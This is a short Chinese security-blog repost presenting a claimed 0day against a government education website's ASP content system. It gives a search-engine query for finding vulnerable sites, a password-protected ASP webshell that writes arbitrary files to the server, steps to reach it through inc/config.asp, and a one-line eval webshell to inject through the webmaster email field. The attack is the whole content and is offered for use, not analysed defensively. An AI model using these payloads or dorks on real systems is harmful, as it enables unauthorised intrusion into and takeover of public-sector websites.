某政府教育网站0day

颓废 2019年5月19日10:02:13评论631 views字数 747阅读2分29秒阅读模式

inurl:printpage.asp?ArticleID=

在后台版权信息栏里写入小马

if Request(“pass”)=”520″ then

dim allen,creat,text,thisline,path

if Request(“creat”)=”yes” then

Set fs = CreateObject(“Scripting.FileSystemObject”) 

Set outfile=fs.CreateTextFile(server.mappath(Request(“path”)))

outfile.WriteLine Request(“text”)

Response.write “xxxx”

end if

Response.write “<form method=’POST’action=’”&Request.ServerVariables(“URL”)&”?pass=520&creat=yes’>”

Response.write “<textarea name=’text’>”&thisline&”</textarea><br>”

Response.write “<input type=’text’ name=’path’ value=’”&Request(“path”)&”’>”

Response.write “<input name=’submit’ type=’submit’ value=’ok’ ></form>”

Response.end

end if

%>

别跳转任何页面。直接在ie地址栏内将admin/Admin_Login.asp替换成 inc/config.asp?t2ck=520

可以在站长信箱那里写入”%><%eva(request(“baidu5 “))%><%’ 然后直接连接inc目录下的config.asp

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:02:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某政府教育网站0dayhttp://cn-sec.com/archives/68405.html

发表评论

匿名网友 填写信息